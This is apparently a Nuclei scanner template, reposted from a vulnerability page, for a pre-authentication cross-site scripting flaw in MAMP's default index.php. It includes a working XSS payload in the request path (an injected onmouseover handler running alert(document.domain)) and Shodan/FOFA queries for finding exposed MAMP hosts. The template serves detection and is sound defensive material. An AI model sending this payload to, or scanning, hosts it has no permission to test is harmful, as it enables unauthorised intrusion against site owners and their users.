A Cross-Site Scripting (XSS) vulnerability exists in the default installation of MAMP server. The file `/Applications/MAMP/htdocs/index.php` is susceptible to malicious input, allowing attackers to inject JavaScript code that executes in the context of the victim's browser. This vulnerability can be exploited without prior authentication.
PoC代码[已公开]
id: mamp-server-xss
info:
name: MAMP Server - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A Cross-Site Scripting (XSS) vulnerability exists in the default installation of MAMP server. The file `/Applications/MAMP/htdocs/index.php` is susceptible to malicious input, allowing attackers to inject JavaScript code that executes in the context of the victim's browser. This vulnerability can be exploited without prior authentication.
impact: |
Exploiting this vulnerability can allow attackers to execute arbitrary JavaScript in the victim's browser.
remediation: |
Implement input validation and output encoding to sanitize user inputs. Apply the vendor-supplied patch or upgrade MAMP to a version where the vulnerability is resolved.
reference:
- https://octagon.net/blog/2022/01/26/mamp-server-preauth-xss-leading-to-host-compromise-0day/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"MAMP"
fofa-query: title="MAMP"
tags: mamp,server,xss,vuln
http:
- method: GET
path:
- '{{BaseURL}}/index.php/test"%20onmouseover="alert(document.domain);"%20style="font-size:100000px;background-color:white";'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'MAMP'
- 'test" onmouseover="alert(document.domain);" style'
condition: and
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a0048304602210087ad55f3f9ee933294ec767150d08702ff336bd1e75adc8ca1e6a176532f63b602210082b03f68e60a19b495e8cae10d24afc040a39fe3386748ed649da802af56ceaa:922c64590222798bb761d5b6d8e72950